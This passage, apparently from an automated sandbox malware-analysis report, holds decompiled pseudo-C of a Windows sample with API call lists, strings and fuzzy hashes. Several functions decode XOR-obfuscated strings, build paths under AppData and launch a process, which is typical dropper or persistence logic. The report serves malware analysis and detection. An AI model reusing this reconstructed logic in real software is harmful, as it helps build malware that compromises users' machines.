													_t294 = _t293 + 0xc;
													__eflags = _t119;
													if(_t119 == 0) {
														_t188 = _t207 - 5 + _t267;
														__eflags = _t188;
														_v8 = _t188;
														_t189 = E00B55BBD();
														_t207 = 0xb35860;
														_v12 =  *_t189;
														while(1) {
															_t191 = E00B56383(_v8, 5, _t207);
															_t294 = _t294 + 0xc;
															__eflags = _t191;
															if(_t191 != 0) {
																goto L38;
															}
															_t192 = E00B56EA8(_t207, _t280, _t267, _t191);
															_pop(_t223);
															__eflags = _t192;
															if(_t192 == 0) {
																_t193 = E00B55BBD();
																_push(_a16);
																_push(_a12);
																 *_t193 = _v12;
																_push(_t267);
																_push(_a4);
																L39();
																_t215 = _t193;
																goto L36;
															} else {
																_t207 = _t207 + 5;
																__eflags = _t207 - 0xb35874;
																if(_t207 != 0xb35874) {
																	continue;
																} else {
																	E00B564B8(_t267);
																	goto L34;
																}
															}
															goto L103;
														}
													}
													goto L38;
												} else {
													_t215 = _t206 | 0xffffffff;
													L36:
													E00B564B8(_t267);
													goto L37;
												}
											} else {
												_t197 = E00B56EA8(_t206, _t280, _t206, 0);
												__eflags = _t197;
												if(_t197 != 0) {
													L34:
													_t215 = _t207 | 0xffffffff;
												} else {
													_push(_a16);
													_push(_a12);
													_push(_t206);
													_push(_a4);
													L39();
													_t215 = _t197;
												}
												L37:
												E00B564B8(_t280);
												_t110 = _t215;
												goto L13;
											}
										} else {
											_t266 = E00B65190(_t280, 0x3a);
											__eflags = _t266;
											if(_t266 != 0) {
												goto L21;
											} else {
												_t252 = _t280;
												_t264 = _t252 + 1;
												do {
													_t199 =  *_t252;
													_t252 = _t252 + 1;
													__eflags = _t199;
												} while (_t199 != 0);
												_t267 = _t252 - _t264 + 3;
												_t207 = E00B598AF(_t267, 1);
												_pop(_t223);
												__eflags = _t207;
												if(_t207 != 0) {
													_t201 = E00B56383(_t207, _t267, 0xb3585c);
													_t294 = _t293 + 0xc;
													__eflags = _t201;
													if(_t201 != 0) {
														L38:
														_push(0);
														_push(0);
														_push(0);
														_push(0);
														_push(0);
														E00B52919();
														asm("int3");
														_t290 = _t294;
														__eflags = _v36;
														if(_v36 == 0) {
															L40:
															 *((intOrPtr*)(E00B55BBD())) = 0x16;
															return E00B528EC() | 0xffffffff;
														}
														__eflags = _a8;
														if(_a8 == 0) {
															goto L40;
														}
														__eflags = _v0 - 4;
														if(_v0 > 4) {
															 *(E00B55BAA()) =  *_t186 & 0x00000000;
															goto L40;
														}
														_push(_t207);
														_push(_t267);
														_v20 = 0;
														_v12 = 0;
														_t127 = E00B61217(_a8, _a12,  &_v20,  &_v12);
														_t208 = _t207 | 0xffffffff;
														__eflags = _t127 - _t208;
														if(_t127 == _t208) {
															E00B564B8(_v12);
															_v12 = 0;
															E00B564B8(_v20);
															L48:
															_t147 = _t208;
															L75:
															return _t147;
														}
														__eflags = _v0 - 4;
														_v16 = 0;
														_t132 = E00B56A8A( &_v16,  &_v24, (_t127 & 0xffffff00 | _v0 != 0x00000004) & 0x000000ff);
														__eflags = _t132;
														if(_t132 == 0) {
															E00B564B8(_v16);
															_v16 = 0;
															E00B564B8(_v12);
															_v12 = 0;
															E00B564B8(_v20);
															goto L48;
														}
														__eflags = _v0 - 4;
														_push(_t280);
														if(_v0 == 4) {
															_push(8);
															_pop(0);
														}
														_t133 = E00B55BAA();
														 *_t133 = 0;
														_t269 = 0x44;
														E00B4D0F0(_t269,  &_v116, 0, _t269);
														_v66 = _v24;
														_v64 = _v16;
														_v116 = _t269;
														_t141 = E00B61292(_t223, __eflags, _a4, _v20, 0, 0, 1, 0, _v12, 0,  &_v116,  &_v48);
														_t285 = _v48;
														_t270 = _v44;
														__eflags = _t141;
														if(_t141 == 0) {
															L60:
															E00B55B87(GetLastError());
															__eflags = _t270 - _t208;
															if(_t270 != _t208) {
																CloseHandle(_t270);
															}
															__eflags = _t285 - _t208;
															if(_t285 != _t208) {
																CloseHandle(_t285);
															}
															L70:
															E00B564B8(_v16);
															_v16 = _v16 & 0x00000000;
															E00B564B8(_v12);
															_v12 = _v12 & 0x00000000;
															E00B564B8(_v20);
															_t147 = _t208;
															L74:
															goto L75;
														}
														_t150 = _v0;
														__eflags = _t150 - 2;
														if(_t150 != 2) {
															__eflags = _t150;
															if(_t150 != 0) {
																__eflags = _t150 - 4;
																if(_t150 != 4) {
																	__eflags = _t270 - _t208;
																	if(_t270 != _t208) {
																		CloseHandle(_t270);
																	}
																	E00B564B8(_v16);
																	_v16 = _v16 & 0x00000000;
																	E00B564B8(_v12);
																	_t76 =  &_v12;
																	 *_t76 = _v12 & 0x00000000;
																	__eflags =  *_t76;
																	E00B564B8(_v20);
																	_t147 = _t285;
																	goto L74;
																}
																__eflags = _t270 - _t208;
																if(_t270 != _t208) {
																	CloseHandle(_t270);
																}
																__eflags = _t285 - _t208;
																if(_t285 != _t208) {
																	CloseHandle(_t285);
																}
																_t208 = 0;
																__eflags = 0;
																goto L70;
															}
															WaitForSingleObject(_t285, _t208);
															_t177 = GetExitCodeProcess(_v48,  &_v28);
															__eflags = _t177;
															if(_t177 == 0) {
																goto L60;
															}
															_v32 = _v28;
															__eflags = _t270 - _t208;
															if(_t270 != _t208) {
																CloseHandle(_t270);
															}
															__eflags = _t285 - _t208;
															if(_t285 != _t208) {
																CloseHandle(_t285);
															}
															_t208 = _v32;
															goto L70;
														}
														E00B52EE0(0);
														asm("int3");
														_push(_t290);
														_push(_t208);
														_t210 = _t223;
														_push(_t285);
														_push(_t270);
														_v196 = _t210;
														 *( *( *_t210)) =  *( *( *_t210)) & 0x00000000;
														 *( *( *(_t210 + 4))) =  *( *( *(_t210 + 4))) & 0x00000000;
														_t287 =  *0xb6a8c8; // 0x40
														__eflags = _t287;
														if(_t287 != 0) {
															_t80 = _t287 - 1; // 0x3f
															_t277 = _t80;
															while(1) {
																_t240 = (_t277 & 0x0000003f) * 0x38;
																_t168 =  *((intOrPtr*)(0xb6a6c8 + (_t277 >> 6) * 4));
																__eflags =  *((char*)(_t168 + _t240 + 0x28));
																if( *((char*)(_t168 + _t240 + 0x28)) == 0) {
																	goto L82;
																}
																_t277 = _t277 - 1;
																_t287 = _t287 - 1;
																__eflags = _t287;
																if(_t287 != 0) {
																	continue;
																}
																goto L82;
															}
														}
														L82:
														__eflags = _t287 - 0x3332;
														if(_t287 < 0x3332) {
															_v36 = 0x00000004 + _t287 * 0x00000005 & 0x0000ffff;
															_t159 = E00B598AF(0x00000004 + _t287 * 0x00000005 & 0x0000ffff, 1);
															_v28 = _t159;
															__eflags = _t159;
															if(_t159 != 0) {
																_t87 = _t159 + 4; // 0x4
																_t258 = _t87;
																 *_t159 = _t287;
																_t227 = _t258 + _t287;
																_v16 = _t258;
																_t272 = 0;
																_v20 = _t227;
																_v24 = _t227;
																__eflags = _t287;
																if(_t287 != 0) {
																	_t163 = _t258;
																	_t214 = _t227;
																	do {
																		_t238 = (_t272 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xb6a6c8 + (_t272 >> 6) * 4));
																		_t261 =  *((intOrPtr*)(_t238 + 0x28));
																		__eflags = _t261 & 0x00000010;
																		if((_t261 & 0x00000010) != 0) {
																			 *(_t163 + _t272) = 0;
																			_t239 = _t238 | 0xffffffff;
																			__eflags = _t239;
																		} else {
																			 *(_t163 + _t272) = _t261;
																			_t239 =  *(_t238 + 0x18);
																		}
																		 *_t214 = _t239;
																		_t272 = _t272 + 1;
																		_t214 =  &(_t214[1]);
																		__eflags = _t272 - _t287;
																	} while (_t272 != _t287);
																	_t159 = _v28;
																	_t210 = _v32;
																	_t258 = _v16;
																}
																__eflags =  *((char*)( *((intOrPtr*)(_t210 + 8))));
																if( *((char*)( *((intOrPtr*)(_t210 + 8)))) == 0) {
																	_t234 = 0;
																	__eflags = 0;
																	while(1) {
																		__eflags = _t287 - 3;
																		if(_t287 >= 3) {
																			_t274 = 3;
																		} else {
																			_t274 = _t287;
																		}
																		__eflags = _t234 - _t274;
																		if(_t234 != _t274) {
																			_t275 = _v20;
																			 *_t258 = 0;
																			 *_t275 =  *_t275 | 0xffffffff;
																			_t234 = _t234 + 1;
																			_t258 = _t258 + 1;
																			_v20 =  &(_t275[1]);
																			continue;
																		}
																		goto L100;
																	}
																}
																L100:
																 *( *( *_t210)) = _t159;
																_t212 = 1;
																__eflags = 1;
																 *( *( *(_t210 + 4))) = _v36;
															} else {
																_t164 = E00B55BBD();
																_t212 = 0;
																 *_t164 = 0xc;
															}
															E00B564B8(0);
															_t162 = _t212;
														} else {
															 *((intOrPtr*)(E00B55BBD())) = 0xc;
															_t162 = 0;
														}
														return _t162;
													} else {
														_t202 = E00B60E2C(_t207, _t267, _t280);
														_t294 = _t294 + 0xc;
														__eflags = _t202;
														if(_t202 != 0) {
															goto L38;
														} else {
															_t5 = _t207 + 2; // 0x2
															_t266 = _t5;
															E00B564B8(_t202);
															goto L21;
														}
													}
												} else {
													_t110 = E00B564B8(_t200) | 0xffffffff;
													__eflags = _t110;
													L13:
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					 *((intOrPtr*)(E00B55BBD())) = 0x16;
					_t110 = E00B528EC() | 0xffffffff;
					L14:
					return _t110;
				}
				goto L103;
			}

APIs

_strrchr.LIBCMT ref: 00B56583
_strrchr.LIBCMT ref: 00B5658D
_strrchr.LIBCMT ref: 00B565AA
_free.LIBCMT ref: 00B565D9
_strrchr.LIBCMT ref: 00B56634
_free.LIBCMT ref: 00B56617

Part of subcall function 00B564B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?), ref: 00B564CE
Part of subcall function 00B564B8: GetLastError.KERNEL32(?,?,00B5B9CA,?,00000000,?,?,?,00B5BC6F,?,00000007,?,?,00B5C2E4,?,?), ref: 00B564E0

_free.LIBCMT ref: 00B56718
_free.LIBCMT ref: 00B5671F

Strings

.com, xrefs: 00B566B9, 00B566C3
ccs, xrefs: 00B566E5

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free_strrchr$ErrorFreeHeapLast
String ID: .com$ccs
API String ID: 1244457489-1235067636
Opcode ID: a6d495f8028f056b3ca294ceccb3b4774eca0630cabbb23815dc0c76f114b408
Instruction ID: 0aa4379a4d9f7d75c0b23c0664e32b6a093ebc86599d93bb2a48a1a78c0cd042
Opcode Fuzzy Hash: a6d495f8028f056b3ca294ceccb3b4774eca0630cabbb23815dc0c76f114b408
Instruction Fuzzy Hash: 9D512C726006056AEF256A749C86BBB37DCDF55366FE401EDFD1097282FB76CD088260

Uniqueness

Uniqueness Score: -1.00%

Function 00B44CEE, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 188
stringprocessCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00B44CEE(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t50;
				CHAR* _t54;
				intOrPtr _t60;
				void* _t64;
				void _t65;
				void _t66;
				CHAR* _t72;
				char _t75;
				CHAR* _t91;
				signed char _t93;
				void* _t99;
				signed int _t104;
				void* _t110;
				intOrPtr* _t111;
				void* _t114;
				signed int _t115;
				void* _t117;
				void* _t120;
				intOrPtr _t126;
				intOrPtr* _t130;
				void* _t131;
				CHAR* _t132;
				CHAR* _t133;
				void* _t135;
				CHAR* _t136;
				signed int _t138;
				void* _t140;
				void* _t142;

				_t142 = __eflags;
				_t50 =  *0xb69014; // 0xce6f0fb5
				 *(_t138 + 0xec) = _t50 ^ _t138;
				 *((intOrPtr*)(_t138 + 0x20)) = E00B509A2();
				E00B42B76(__ebx, 0x104, __esi, _t142, _t52);
				_t54 = E00B509A2();
				_t130 = __imp__SHGetFolderPathA;
				_t91 = _t54;
				 *(_t138 + 0x1c) = _t91;
				 *_t130(0, 0x1a, 0, 0, _t91, 0x208, 0x104, __edi, __esi, _t135, __ebx);
				asm("movaps xmm0, [0xb3db70]");
				_t99 = 0;
				asm("movups [esp+0x78], xmm0");
				 *((intOrPtr*)(_t138 + 0x88)) = 0x2137211f;
				 *((intOrPtr*)(_t138 + 0x8c)) = 0x23057535;
				 *((short*)(_t138 + 0x90)) = 0x3b39;
				 *((intOrPtr*)(_t138 + 0x92)) = 0x3e36;
				do {
					_t8 = _t99 + 0x40; // 0x40
					 *(_t138 + _t99 + 0x78) =  *(_t138 + _t99 + 0x78) ^ _t8;
					_t99 = _t99 + 1;
				} while (_t99 < 0x1d);
				 *((char*)(_t138 + 0x95)) = 0;
				lstrcatA(_t91, _t138 + 0x78);
				_t60 = E00B509A2();
				 *((intOrPtr*)(_t138 + 0x18)) = _t60;
				_t136 = E00B509A2();
				 *_t130(0, 0x1a, 0, 0, _t136, 0x104, 0x40);
				asm("movaps xmm0, [0xb3db70]");
				asm("movups [esp+0x78], xmm0");
				 *((char*)(_t138 + 0x88)) = 0;
				_t64 = E00B42846(_t138 + 0x78);
				_t114 = _t64;
				_t131 = _t64;
				do {
					_t65 =  *_t114;
					_t114 = _t114 + 1;
				} while (_t65 != 0);
				_t115 = _t114 - _t131;
				_t18 = _t136 - 1; // -1
				_t120 = _t18;
				do {
					_t66 =  *(_t120 + 1);
					_t120 = _t120 + 1;
				} while (_t66 != 0);
				_t104 = _t115 >> 2;
				memcpy(_t120, _t131, _t104 << 2);
				memcpy(_t131 + _t104 + _t104, _t131, _t115 & 0x00000003);
				_t140 = _t138 + 0x18;
				_t132 =  *(_t140 + 0x14);
				E00B4A313(lstrcatA, _t132, _t132);
				lstrcatA(_t136, _t132);
				E00B48B24( *((intOrPtr*)(_t140 + 0x1c)), _t136);
				_push(0x514);
				_t72 = E00B509A2();
				asm("movaps xmm0, [0xb3dcf0]");
				_t133 = _t72;
				asm("movups [esp+0x9c], xmm0");
				asm("movaps xmm0, [0xb3dd40]");
				_t110 = 0;
				asm("movups [esp+0xa8], xmm0");
				 *((intOrPtr*)(_t140 + 0xe8)) = 0xbef3e5f1;
				asm("movaps xmm0, [0xb3db30]");
				asm("movups [esp+0xb8], xmm0");
				 *((intOrPtr*)(_t140 + 0xec)) = 0xaae4fcf0;
				asm("movaps xmm0, [0xb3db50]");
				asm("movups [esp+0xc8], xmm0");
				 *((char*)(_t140 + 0xf0)) = 0;
				asm("movaps xmm0, [0xb3df60]");
				asm("movups [esp+0xd8], xmm0");
				do {
					_t26 = _t110 + 0x40; // 0x40
					 *(_t140 + _t110 + 0x98) =  *(_t140 + _t110 + 0x98) ^ _t26;
					_t110 = _t110 + 1;
				} while (_t110 < 0x58);
				_t111 = _t140 + 0x98;
				 *((char*)(_t140 + 0xf0)) = 0;
				_t117 = _t133 - _t111;
				do {
					_t75 =  *_t111;
					 *((char*)(_t117 + _t111)) = _t75;
					_t111 = _t111 + 1;
				} while (_t75 != 0);
				_t93 = 0x62;
				 *((char*)(_t140 + 0x15)) = 0;
				 *((char*)(_t140 + 0x15)) = 0;
				 *(_t140 + 0x14) = _t93 ^ 0x00000040;
				lstrcatA(_t133, _t140 + 0x14);
				lstrcatA(_t133, _t136);
				 *((char*)(_t140 + 0x15)) = 0;
				 *(_t140 + 0x14) = _t93 ^ 0x00000040;
				 *((char*)(_t140 + 0x1d)) = 0;
				lstrcatA(_t133, _t140 + 0x14);
				_t126 = 0x44;
				E00B4D0F0(_t126, _t140 + 0x34, 0, lstrcatA);
				 *((intOrPtr*)(_t140 + 0x3c)) = _t126;
				 *((intOrPtr*)(_t140 + 0x44)) = 0xb699c0;
				asm("stosd");
				_t141 = _t140 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA( *(_t140 + 0x4c), _t133, 0, 0, 0, 0, 0, 0, _t141 + 0x34, _t141 + 0x20);
				return E00B4AE43( *(_t141 + 0xfc) ^ _t141);
			}

APIs

Part of subcall function 00B42B76: GetCurrentProcess.KERNEL32(00000000), ref: 00B42BE0
Part of subcall function 00B42B76: IsWow64Process.KERNEL32(00000000), ref: 00B42BE7
Part of subcall function 00B42B76: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000101,?), ref: 00B42C08

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00000000,00000000,770BE3A0,?,?), ref: 00B44D3B
lstrcatA.KERNEL32(00000000,?), ref: 00B44D97
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 00B44DB6
lstrcatA.KERNEL32(00000000,?,?), ref: 00B44E07
lstrcatA.KERNEL32(00000000,?), ref: 00B44EDB
lstrcatA.KERNEL32(00000000,00000000), ref: 00B44EDF
lstrcatA.KERNEL32(00000000,?), ref: 00B44EF9
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 00B44F38

Strings

Tett, xrefs: 00B44F14
6>, xrefs: 00B44D6B
9;, xrefs: 00B44D61

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcat$Process$FolderPath$CreateCurrentOpenWow64
String ID: 6>$9;$Tett
API String ID: 3226924228-1827138343
Opcode ID: 4c21dff1bd2da2f46381aa0cd3738d00bffbcf023627ff9b042e7a40232c9bed
Instruction ID: 06f21887c8289e29cf1415a648942e5d8abb61f1750d3ac3329c8c33516f11c4
Opcode Fuzzy Hash: 4c21dff1bd2da2f46381aa0cd3738d00bffbcf023627ff9b042e7a40232c9bed
Instruction Fuzzy Hash: EA61D4614083849EE321DF38DC41BAFBBE8EFDA304F10455DF9C897162EA7459899B63

Uniqueness

Uniqueness Score: -1.00%

Function 00B5B36D, Relevance: 18.4, APIs: 12, Instructions: 375
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00B5B36D(char _a4) {
				void* _v8;
				void* _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t105;
				char _t195;
				intOrPtr* _t196;
				char _t209;
				signed int _t212;
				char _t221;
				char _t222;
				char* _t226;
				signed int _t227;
				signed int _t231;
				signed int _t232;
				void* _t234;
				void* _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				char* _t257;

				_t209 = _a4;
				_v16 = 0;
				_v28 = _t209;
				_v24 = 0;
				if( *((intOrPtr*)(_t209 + 0xac)) != 0 ||  *((intOrPtr*)(_t209 + 0xb0)) != 0) {
					_t234 = E00B598AF(1, 0x50);
					_v8 = _t234;
					E00B564B8(0);
					if(_t234 != 0) {
						_t227 = E00B598AF(1, 4);
						_v12 = _t227;
						E00B564B8(0);
						if(_t227 != 0) {
							if( *((intOrPtr*)(_t209 + 0xac)) == 0) {
								_t212 = 0x14;
								memcpy(_v8, 0xb690c0, _t212 << 2);
								L24:
								_t236 = _v8;
								_t231 = _v16;
								 *_t236 =  *( *(_t209 + 0x88));
								 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)( *(_t209 + 0x88) + 4));
								 *((intOrPtr*)(_t236 + 8)) =  *((intOrPtr*)( *(_t209 + 0x88) + 8));
								 *((intOrPtr*)(_t236 + 0x30)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x30));
								 *((intOrPtr*)(_t236 + 0x34)) =  *((intOrPtr*)( *(_t209 + 0x88) + 0x34));
								 *_v12 = 1;
								if(_t231 != 0) {
									 *_t231 = 1;
								}
								goto L26;
							}
							_t232 = E00B598AF(1, 4);
							_v16 = _t232;
							E00B564B8(0);
							if(_t232 != 0) {
								_t233 =  *((intOrPtr*)(_t209 + 0xac));
								_t14 = _t234 + 0xc; // 0xc
								_t237 = E00B5EDC5(_t209,  *((intOrPtr*)(_t209 + 0xac)), _t234,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x15, _t14);
								_t238 = _t237 | E00B5EDC5(_t209,  *((intOrPtr*)(_t209 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t209 + 0xac)), 0x14, _v8 + 0x10);
								_t239 = _t238 | E00B5EDC5(_t209,  *((intOrPtr*)(_t209 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
								_t240 = _t239 | E00B5EDC5(_t209, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
								_v20 = _v8 + 0x1c;
								_t241 = _t240 | E00B5EDC5(_t209, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
								_t242 = _t241 | E00B5EDC5(_t209, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
								_t243 = _t242 | E00B5EDC5(_t209, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
								_t244 = _t243 | E00B5EDC5(_t209, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
								_t245 = _t244 | E00B5EDC5(_t209, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
								_t246 = _t245 | E00B5EDC5(_t209, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
								_t247 = _t246 | E00B5EDC5(_t209, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
								_t248 = _t247 | E00B5EDC5(_t209, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
								_t249 = _t248 | E00B5EDC5(_t209, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
								_t250 = _t249 | E00B5EDC5(_t209, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
								_t251 = _t250 | E00B5EDC5(_t209, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
								_t252 = _t251 | E00B5EDC5(_t209, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
								_t253 = _t252 | E00B5EDC5(_t209, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
								_t254 = _t253 | E00B5EDC5(_t209, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
								_t255 = _t254 | E00B5EDC5(_t209, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
								_t256 = _t255 | E00B5EDC5(_t209, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
								if((E00B5EDC5(_t209, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
									_t226 =  *_v20;
									while(1) {
										_t195 =  *_t226;
										if(_t195 == 0) {
											break;
										}
										_t61 = _t195 - 0x30; // -48
										_t221 = _t61;
										if(_t221 > 9) {
											if(_t195 != 0x3b) {
												L16:
												_t226 = _t226 + 1;
												continue;
											}
											_t257 = _t226;
											do {
												_t196 = _t257 + 1;
												_t222 =  *_t196;
												 *_t257 = _t222;
												_t257 = _t196;
											} while (_t222 != 0);
											continue;
										}
										 *_t226 = _t221;
										goto L16;
									}
									goto L24;
								}
								E00B5B26F(_v8);
								E00B564B8(_v8);
								E00B564B8(_v12);
								E00B564B8(_v16);
								goto L4;
							}
							E00B564B8(_t234);
							E00B564B8(_v12);
							L7:
							goto L4;
						}
						E00B564B8(_t234);
						goto L7;
					}
					L4:
					return 1;
				} else {
					_t231 = 0;
					_v12 = 0;
					_t236 = 0xb690c0;
					L26:
					_t105 =  *(_t209 + 0x84);
					if(_t105 != 0) {
						asm("lock dec dword [eax]");
					}
					if( *((intOrPtr*)(_t209 + 0x7c)) != 0) {
						asm("lock xadd [ecx], eax");
						if((_t105 | 0xffffffff) == 0) {
							E00B564B8( *(_t209 + 0x88));
							E00B564B8( *((intOrPtr*)(_t209 + 0x7c)));
						}
					}
					 *((intOrPtr*)(_t209 + 0x7c)) = _v12;
					 *(_t209 + 0x84) = _t231;
					 *(_t209 + 0x88) = _t236;
					return 0;
				}
			}

APIs

_free.LIBCMT ref: 00B5B3B5
_free.LIBCMT ref: 00B5B3D9
_free.LIBCMT ref: 00B5B3E6
_free.LIBCMT ref: 00B5B40B
_free.LIBCMT ref: 00B5B418
_free.LIBCMT ref: 00B5B421
_free.LIBCMT ref: 00B5B6FC
_free.LIBCMT ref: 00B5B704

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e564dc91c09fa07783498974aaf4ddf3b7690b3acf97c6a618e4404afe65e90c
Instruction ID: c125d5a726baf6fa5991837ec093c05832e9b264c5fc99ac17e1089b7db72c6a
Opcode Fuzzy Hash: e564dc91c09fa07783498974aaf4ddf3b7690b3acf97c6a618e4404afe65e90c
Instruction Fuzzy Hash: FDC13472D40204AFDB20DBA8CC86FEE77F8AB48741F1441E5FE49FB286D6709A459760

Uniqueness

Uniqueness Score: -1.00%

Function 00B44A91, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 187
stringprocessCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00B44A91(void* __ebx, void* __edi, void* __esi, void* __ebp, void* __eflags) {
				signed int _v8;
				signed int _v48;
				char _v55;
				short _v68;
				intOrPtr _v72;
				char _v139;
				short _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				char _v156;
				char _v164;
				char _v184;
				struct _STARTUPINFOA _v260;
				struct _PROCESS_INFORMATION _v276;
				CHAR* _v280;
				CHAR* _v284;
				char _v291;
				char _v292;
				signed int _t49;
				CHAR* _t53;
				intOrPtr _t59;
				void* _t63;
				void _t64;
				void _t65;
				CHAR* _t71;
				char _t74;
				CHAR* _t90;
				CHAR* _t91;
				signed char _t92;
				void* _t97;
				signed int _t102;
				void* _t108;
				intOrPtr* _t109;
				void* _t112;
				signed int _t113;
				void* _t115;
				void* _t118;
				long _t123;
				intOrPtr* _t126;
				void* _t127;
				CHAR* _t128;
				CHAR* _t129;
				signed int _t132;
				void* _t134;

				_t132 =  &(_v260.lpDesktop);
				_t49 =  *0xb69014; // 0xce6f0fb5
				_v8 = _t49 ^ _t132;
				_v260.dwY = E00B509A2();
				E00B42861(0x104, __esi, _t51);
				_t53 = E00B509A2();
				_t126 = __imp__SHGetFolderPathA;
				_t90 = _t53;
				_v260.lpDesktop = _t90;
				 *_t126(0, 0x1c, 0, 0, _t90, 0x208, 0x104);
				asm("movaps xmm0, [0xb3db90]");
				_t97 = 0;
				asm("movups [esp+0x7c], xmm0");
				_v152 = 0x73203423;
				_v148 = 0x36223410;
				_v144 = 4;
				do {
					_t7 = _t97 + 0x40; // 0x40
					 *(_t132 + _t97 + 0x7c) =  *(_t132 + _t97 + 0x7c) ^ _t7;
					_t97 = _t97 + 1;
				} while (_t97 < 0x19);
				_v139 = 0;
				lstrcatA(_t90,  &_v164);
				_t59 = E00B509A2();
				_v276.hThread = _t59;
				_t91 = E00B509A2();
				_v276.dwThreadId = _t91;
				 *_t126(0, 0x1c, 0, 0, _t91, 0x104, 0x40);
				asm("movaps xmm0, [0xb3da90]");
				asm("movups [esp+0x7c], xmm0");
				_t63 = E00B42D2B( &_v184);
				_t112 = _t63;
				_t127 = _t63;
				do {
					_t64 =  *_t112;
					_t112 = _t112 + 1;
				} while (_t64 != 0);
				_t113 = _t112 - _t127;
				_t17 = _t91 - 1; // -1
				_t118 = _t17;
				do {
					_t65 =  *(_t118 + 1);
					_t118 = _t118 + 1;
				} while (_t65 != 0);
				_t102 = _t113 >> 2;
				memcpy(_t118, _t127, _t102 << 2);
				memcpy(_t127 + _t102 + _t102, _t127, _t113 & 0x00000003);
				_t134 = _t132 + 0x18;
				_t128 = _v292;
				E00B4A313(_t91, _t128, _t128);
				lstrcatA(_t91, _t128);
				E00B48B24(_v292, _t91);
				_push(0x208);
				_t71 = E00B509A2();
				asm("movaps xmm0, [0xb3de70]");
				_t129 = _t71;
				asm("movups [esp+0x9c], xmm0");
				asm("movaps xmm0, [0xb3dc70]");
				_t108 = 0;
				asm("movups [esp+0xa8], xmm0");
				_v72 = 0xd1cbc58d;
				asm("movaps xmm0, [0xb3de60]");
				asm("movups [esp+0xb8], xmm0");
				_v68 = 0x99;
				asm("movaps xmm0, [0xb3db80]");
				asm("movups [esp+0xc8], xmm0");
				asm("movaps xmm0, [0xb3df50]");
				asm("movups [esp+0xd8], xmm0");
				asm("movaps xmm0, [0xb3df80]");
				asm("movups [esp+0xe8], xmm0");
				do {
					_t24 = _t108 + 0x40; // 0x40
